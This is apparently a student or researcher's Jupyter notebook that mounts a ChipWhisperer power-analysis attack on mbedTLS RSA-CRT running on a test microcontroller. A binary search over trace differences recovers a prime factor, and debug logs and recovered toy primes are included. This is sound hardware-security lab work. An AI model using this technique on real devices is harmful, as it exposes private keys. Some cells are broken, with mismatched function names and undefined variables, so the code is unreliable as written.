### Setup

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
CRYPTO_TARGET = 'MBEDTLS'

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../../hardware/victims/firmware/simpleserial-rsa
#make clean PLATFORM=$1 CRYPTO_TARGET=$2
make PLATFORM=$1 CRYPTO_TARGET=$2 

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = '../../../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-CWLITEXMEGA.hex'

In [ ]:
cw.program_target(scope, prog, fw_path)

In [ ]:
import numpy as np
import time 
import matplotlib.pylab as plt
import matplotlib

In [ ]:
e = 65537

In [ ]:
#2Bytes -> key_len = 4
n = 3849453107

p = 62549
q = 61543
dp = 11321
dq = 647
qinv = 34632

In [ ]:
#8Bytes -> key_len = 16
n = 89525655797379415138998373505682772229

In [ ]:
#16Bytes -> key_len = 32
n = 52270967183635299110959169812507925945033892524340745668343932985606720718177

In [ ]:
#key lenght of n; p, q have lenght key_len//2
key_len = 16

### find numbers

In [ ]:
# Parameters
p = 14091828191315287507 
q = 6353019252147394247
    9223372036854775808
     288230376151711744
e = 65537
n = 89525655797379415138998373505682772229
max_msg = 10000  # Set a range for msg (you can adjust this range)

In [ ]:
def find_valid_msg_d1(p, q, e, n, max_msg):
    valid_msgs = []
    for msg in range(1, max_msg + 1):  # Iterate through possible msg values
        x = pow(msg, e, n)  # Compute (msg^e) % n efficiently using modular exponentiation
        if (x % p) - (x % q) < 0:  # Check the condition
            valid_msgs.append(msg)
    return valid_msgs



# Find and display valid messages
valid_msgs = find_valid_msgs(p, q, e, n, max_msg)
print(f"Valid messages: {valid_msgs}")

In [ ]:
def find_valid_msgs_d0(p, q, e, n, max_msg):
    valid_msgs = []
    for msg in range(1, max_msg + 1):  # Iterate through possible msg values
        x = pow(msg, e, n)  # Compute (msg^e) % n efficiently using modular exponentiation
        if (x % p) - (x % q) > 0:  # Check the condition
            valid_msgs.append(msg)
    return valid_msgs

# Find and display valid messages
valid_msgs = find_valid_msgs(p, q, e, n, max_msg)
print(f"Valid messages: {valid_msgs}")

### capture trace setup

In [ ]:
scope.clock.adc_src = "clkgen_x1"
scope.adc.samples = 1500

#scope.adc.timeout = 50

In [ ]:
import time

def capture_RSA_trace(scope, target, text):
    scope.arm()
    target.simpleserial_write('t', text)

    # get debug output, nötig?
    #rec_str = target.read(1000, timeout=2000)
    #received_str = rec_str.replace("\\r\\n", "\n")
    #print(received_str)
    
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    time.sleep(2)
    output = target.read(timeout=20)
    print('first: ', output.replace("\\r\\n\\z00", "\n"))
    
    target.write("1\n")
    time.sleep(0.2)
    #output += target.read(timeout=10)
    output = target.read(timeout=10) 
    print('next 48 bytes: ', output.replace("r", "").replace("\nz00","").replace("\n",""))

    target.write("2\n")
    time.sleep(0.2)
    #output += target.read(timeout=10)
    output = target.read(timeout=10) 
    print('last bytes: ', output.replace("r", "").replace("\nz00","").replace("\n",""))


    #newout = output.replace("r", "").replace("\nz00","").replace("\n","")
    #print('output: ', newout)

    if SCOPETYPE == "OPENADC":
        print('#samples: ', scope.adc.trig_count)
    
    target.simpleserial_wait_ack() #!!!!
    return scope.get_last_trace()

In [ ]:
import time

def capture_RSA_trace(scope, target, text):
    target.flush()
    scope.arm()
    target.simpleserial_write('t', text)

    rec_str = target.read(2000, timeout=20000)
    received_str = rec_str.replace("\\r\\n", "\n")
    print(received_str)
    
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    #time.sleep(2)
    #output = target.read(2000, timeout=200)
    #print(output.replace("\\r\\n\\z00", "\n"))
    
    target.simpleserial_wait_ack() #!!!!
    return scope.get_last_trace()

### test numbers for 2 Byte prim numbers

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 54
c = (msg ** e) % n

cb = c.to_bytes(key_len,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace1 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace1, 'r')




In [ ]:
#trigger vor sub 
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 16
c = (msg ** e) % n

cb = c.to_bytes(key_len,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')


#T1:  3937433300
#T2:  3246363000
#T:3532454100
#sub: t1 = T2 -> no



In [ ]:
#trigger vor sub 
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 11
c = (msg ** e) % n

cb = c.to_bytes(key_len,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace3 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace3, 'r')

#t1=t2 -> ja

In [ ]:
#trigger vor sub 
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 3653 
c = (msg ** e) % n

cb = c.to_bytes(key_len,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace4 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace4, 'r')

#t1=t2 -> ja

In [ ]:
print(np.sum(np.abs(trace1 - trace2))) #same
print(np.sum(np.abs(trace1 - trace3))) #diff
print(np.sum(np.abs(trace1 - trace4))) #diff
print(np.sum(np.abs(trace2 - trace3))) #diff
print(np.sum(np.abs(trace2 - trace4))) #diff
print(np.sum(np.abs(trace3 - trace4))) #same 

In [ ]:
plt.figure()
plt.plot(trace1, 'r')
plt.plot(trace2, 'b')
plt.plot(trace2_d1, 'g')

In [ ]:
# #samples für MBEDTLS_MPI_CHK( mbedtls_mpi_sub_mpi( &T, &T1, &T2 ) ) = 1289
# diff(no, no): 8-11
# diff(no, yes): 81

### Key Reconstuction

* find plaintexts x_1 and x_2 mit diff(x_1) = 0 und diff(x_2) = 1.
* mittels binäre suche: finde x mit diff(x-1) = 0 und diff(x) = 1 -> x ist Vielfaches von p 
* ggt(x, n) = p
* x^e mod n

### Algorithmus

Reconstruction of p when its bitlength is half bitlength of n
INPUT: modulus n with the bitlength t, public exponent e.
OUTPUT: prime p such that p divides n.

t = bitlenght von n 
p,q haben bitlänge t/2

x = 2 ** (t/2)
m = x/2 

In [ ]:
# 2 Byte Primzahlen 

t = key_len*8

# x= 2 ** (t/2) 
# m = x/2 
# l = 0 

#upper
x = 2**(t//2)
m = x//2
#lower
l = 0

print(x, m, l)

In [ ]:
#ref trace 2 byte: 54  -> t1>t2 diff(m) = 0
#ref trace 8 byte:
 
plt.figure()

ref_trace_msg_ = 11 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(key_len,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(key_len,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)


In [ ]:
plt.figure()

x = 6359082673847140352
m = 6354579074219769856
l = 6350075474592399360

ref_trace_msg_ = 11 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(key_len,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(key_len,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)

In [ ]:
plt.figure()

x = 6353019252693270528
m = 6353019252156399616
l = 6353019251619528704

ref_trace_msg_ = 11 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(key_len,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(key_len,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)

In [ ]:
plt.figure()

x = 6353019252147394248
m = 6353019252147394244
l = 6353019252147394240

ref_trace_msg_ = 11 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(key_len,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(key_len,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)

### fehlermeldung 1 (programm läuft trotzdem weiter, allerdings mit falschen werten, teils mit warnings teils ohne ) 
(ChipWhisperer Target ERROR|File SimpleSerial.py:351) Target did not ack

57344 0x5708e82c 10.67578125
61440 0xf000 

(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 08

Timeout happened during acquisition
r8536BE16 -> enc
r2D31360000000000 -> ret1
r2D31373136380000 -> ret2
r0000E000
zF0

(ChipWhisperer Target ERROR|File SimpleSerial.py:351) Target did not ack

61440 0x8536be16 100.130859375
59392 0xe800 

### fehlermeldung 2 (mehr abfrage ret status) -> in rsa_private
(ChipWhisperer Target ERROR|File SimpleSerial.py:351) Target did not ack

49152 0x729188d7 8.8388671875
57344 0xe000 

r5708E82C -> enc
r3000000000000000 
r4530303000
r4530303000
r3000000000000000
r3000000000000000
r0000E000
r3000000000000000 -> output in cleanup 
r3000000000000000 -> ret values in real dec 
r0000E000 -> output
z00


(ChipWhisperer Target ERROR|File SimpleSerial.py:351) Target did not ack

57344 0x5708e82c 10.6787109375
61440 0xf000 

(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 08

Timeout happened during acquisition
r8536BE16
r3000000000000000 -> erstes ret ok (vor decryption)
r2D31360000000000 -> output t1, t2 fehlt; vermutlich output in cleanoúp 
r2D31373136380000 -> vermutlich output in real dec
r0000E000
zF0

(ChipWhisperer Target ERROR|File SimpleSerial.py:351) Target did not ack

61440 0x8536be16 100.736328125
59392 0xe800 

### fehlermeldung 3 (noch mehr abfrage ret status) -> fehler bei erster berechnung t1 

49152 0x729188d7 8.7783203125
57344 0xe000 

r5708E82C -> enc
r3000000000000000 > erstes ret ok (vor decryption) -> 30(ASCII) = 0 
r3000000000000000 > ret nach t1
r4530303000 ->  print t1
r3000000000000000 > ret nach t2
r4530303000 -> print t2
r3000000000000000
r3000000000000000
r0000E000 -> output in rsa_private 
r3000000000000000 -> output in cleanup 
r3000000000000000 > ret values in real dec 
r0000E000 -> output
z00

(ChipWhisperer Target ERROR|File SimpleSerial.py:351) Target did not ack

57344 0x5708e82c 10.888671875
61440 0xf000 

(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 08

Timeout happened during acquisition
r8536BE16 -> enc
r3000000000000000 > erstes ret ok (vor decryption)
r2D31360000000000 > output in cleanup  = -16      ----------->>>>>>>>>>>>> fehler bei t1 
r2D31373136380000 > ret values in real dec = -17 168
r0000E000
zF0

(ChipWhisperer Target ERROR|File SimpleSerial.py:351) Target did not ack

61440 0x8536be16 103.4931640625
59392 0xe800 

### fehlermeldung 4 (mehr analyse vor t1) 

49152 0x729188d7 9.4150390625
57344 0xe000 

r5708E82C
r3000000000000000
r353730384538324300 -> T
r3243333900 -> dp
r4634353500 ->p
r00 -> rp
r3000000000000000 -> ret nach t1
r4530303000 >  print t1
r0000E000 -> output in rsa_private 
r3000000000000000 -> clenup
r3000000000000000 -> in real_dec
r0000E000 -> output 
z00

(ChipWhisperer Target ERROR|File SimpleSerial.py:351) Target did not ack

57344 0x5708e82c 11.2216796875
61440 0xf000 

(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 08

Timeout happened during acquisition
r8536BE16
r3000000000000000
r383533364245313600 -> T
r3243333900 -> dp
r4634353500 -> p
r00 -> rp -------->>>> abbruch in MBEDTLS_MPI_CHK( mbedtls_mpi_exp_mod( &T1, &T, DP, &ctx->P, &ctx->RP ) ); eingabedaten passen 
r2D31360000000000
r2D31373136380000
r0000E000
zF0

(ChipWhisperer Target ERROR|File SimpleSerial.py:351) Target did not ack

61440 0x8536be16 104.119140625
59392 0xe800 

-------------------------------
#### output bei eingabe 61440 0xf000 bei einzelner ausführung 
encrypted:  2234957334 b'\x856\xbe\x16' <class 'bytes'> 0x8536be16
r8536BE16
r3000000000000000
r383533364245313600
r3243333900
r4634353500
r00
r3000000000000000
r4630303000
r3000000000000000
r3000000000000000
r0000F000
z00


p = 14091828191315287507
q = 6353019252147394247
N = 89525655797379415138998373505682772229

q = N // p
euler = (p-1)*(q-1)

-> d durch erweiterter euklidischer algo 

In [ ]:
scope.dis()
target.dis()